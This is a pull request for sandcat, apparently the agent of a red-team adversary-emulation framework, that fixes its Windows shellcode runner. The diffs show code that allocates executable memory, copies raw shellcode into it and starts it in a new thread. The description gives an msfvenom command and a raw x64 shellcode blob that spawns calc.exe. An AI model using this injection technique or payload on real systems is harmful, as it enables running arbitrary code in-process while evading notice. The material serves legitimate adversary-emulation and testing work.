### PR TITLE
Address issue-433 with sandcat failing to execute shellcode on windows

### DIFF
--- a/gocat-extensions/execute/shellcode/shellcode_windows.go
+++ b/gocat-extensions/execute/shellcode/shellcode_windows.go
@@ -17,19 +17,19 @@ const (
 )
 
 var (
-	kernel32      *syscall.DLL
-	ntdll         *syscall.DLL
-	VirtualAlloc  *syscall.Proc
-	RtlCopyMemory *syscall.Proc
+	hKernel32      *syscall.DLL
+	hNtdll         *syscall.DLL
+	fpVirtualAlloc  *syscall.Proc
+	fpRtlCopyMemory *syscall.Proc
 )
 
 // Runner runner
 func Runner(shellcode []byte) (bool, string) {
-	address, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	address, _, err := fpVirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
 	if checkErrorMessage(err) {
 		return false, execute.ERROR_PID
 	}
-	_, _, err = RtlCopyMemory.Call(address, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
+	_, _, err = fpRtlCopyMemory.Call(address, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
 	if checkErrorMessage(err) {
 		return false, execute.ERROR_PID
 	}
@@ -39,20 +39,27 @@ func Runner(shellcode []byte) (bool, string) {
 
 // IsAvailable does a shellcode runner exist
 func IsAvailable() bool {
-	if kernel32, kernel32Err := syscall.LoadDLL("kernel32.dll"); kernel32Err == nil {
-		if _, vAllocErr := kernel32.FindProc("VirtualAlloc"); vAllocErr != nil {
-			fmt.Printf("[-] VirtualAlloc error: %s", vAllocErr.Error())
+	var kernel32Err error
+	var ntdllErr error
+	var vAllocErr error
+	var rtlCopyMemErr error
+	if hKernel32, kernel32Err = syscall.LoadDLL("kernel32.dll"); kernel32Err == nil {
+		if fpVirtualAlloc, vAllocErr = hKernel32.FindProc("VirtualAlloc"); vAllocErr != nil {
+			fmt.Printf("[-] Failed to load VirtualAlloc API: %s", vAllocErr.Error())
 			return false
 		}
-		if ntdll, ntdllErr := syscall.LoadDLL("ntdll.dll"); ntdllErr == nil {
-			if _, rtlCopyMemErr := ntdll.FindProc("RtlCopyMemory"); rtlCopyMemErr == nil {
+		if hNtdll, ntdllErr = syscall.LoadDLL("ntdll.dll"); ntdllErr == nil {
+			if fpRtlCopyMemory, rtlCopyMemErr = hNtdll.FindProc("RtlCopyMemory"); rtlCopyMemErr == nil {
+				fmt.Printf("[+] Fetched required APIs for shellcode runner.")
 				return true
 			} else {
-				fmt.Printf("[-] RtlCopyMemory error: %s", rtlCopyMemErr.Error())
+				fmt.Printf("[-] Failed to load RtlCopyMemory API: %s", rtlCopyMemErr.Error())
 			}
+		} else {
+			fmt.Printf("[!] Failed to load NTDLL: %s", ntdllErr.Error())
 		}
 	} else {
-		fmt.Printf("[-] LoadDLL error: %s", kernel32Err.Error())
+		fmt.Printf("[-] Failed to load Kernel32: %s", kernel32Err.Error())
 	}
 	return false
 }

--- a/gocat-extensions/execute/shellcode/shellcode_windows.go
+++ b/gocat-extensions/execute/shellcode/shellcode_windows.go
@@ -37,13 +37,17 @@ func Runner(shellcode []byte) (bool, string) {
 
     // Run shellcode in new thread
     output.VerbosePrint("[*] Running shellcode in new thread")
-    hThread, _, err := fpCreateThread.Call(0, 0, address, 0, 0, 0)
+    var threadId uint32
+    pThreadId := unsafe.Pointer(&threadId)
+    hThread, _, err := fpCreateThread.Call(0, 0, address, 0, 0, uintptr(pThreadId))
     if checkErrorMessage(err) {
         return false, execute.ERROR_PID
     }
     if (hThread == 0) {
         output.VerbosePrint("[!] CreateThread returned a null handle.")
         return false, execute.ERROR_PID
+    } else {
+        output.VerbosePrint(fmt.Sprintf("[*] Created thread with ID %d", threadId))
     }
 
     // Run auxiliary go routine to wait for shellcode completion and perform cleanup

--- a/gocat-extensions/execute/shellcode/shellcode_windows.go
+++ b/gocat-extensions/execute/shellcode/shellcode_windows.go
@@ -40,7 +40,8 @@ func Runner(shellcode []byte) (bool, string) {
 	if checkErrorMessage(err) {
 		return false, execute.ERROR_PID
 	}
-	if (hThread == nil) {
+	if (hThread == 0) {
+		println("[!] CreateThread returned a null handle.")
 		return false, execute.ERROR_PID
 	}
 	return true, execute.SUCCESS_PID

--- a/gocat-extensions/execute/shellcode/shellcode_windows.go
+++ b/gocat-extensions/execute/shellcode/shellcode_windows.go
@@ -88,15 +88,16 @@ func IsAvailable() bool {
 		return false
 	}
 	if hNtdll, err = syscall.LoadDLL("ntdll.dll"); err != nil {
-		fmt.Println("[!] Failed to load NTDLL: %s", err.Error())
+		fmt.Printf("[!] Failed to load NTDLL: %s\n", err.Error())
 		return false
 	}
     if fpCreateThread, err = hKernel32.FindProc("CreateThread"); err != nil {
-		fmt.Println("[-] Failed to load CreateThread API: %s", err.Error())
+		fmt.Printf("[-] Failed to load CreateThread API: %s\n", err.Error())
 		return false
 	}
 	if fpRtlCopyMemory, err = hNtdll.FindProc("RtlCopyMemory"); err != nil {
 		fmt.Println("[-] Failed to load RtlCopyMemory API: %s", err.Error())
+		return false
 	}
 
 	fmt.Println("[+] Fetched required APIs for shellcode runner.")


### PR DESCRIPTION
## Description
Addresses https://github.com/mitre/sandcat/issues/433
- Fix API resolution to allow windows sandcat agents to execute shellcode in current process memory.
- now runs shellcode in a separate thread

## Type of change
- [x] Bug fix (non-breaking change which fixes an issue)

## How Has This Been Tested?
Tested on windows 10 with the following shellcode blobs:

Spawns calc, generated using `msfvenom --payload windows/x64/exec CMD=calc.exe EXITFUNC=thread -f raw -o calc.bin`
```
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00
```

Also tested basic case (no-op + ret):
```
0x90, 0xc3
```

For spawning calc, used procmon to verify thread and process creation:
<img width="1024" height="768" alt="shellcodecalcexecexample" src="https://github.com/user-attachments/assets/beb61961-1042-42aa-a345-3193f1652c3c" />


## Checklist:

- [ ] My code follows the style guidelines of this project
- [ ] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
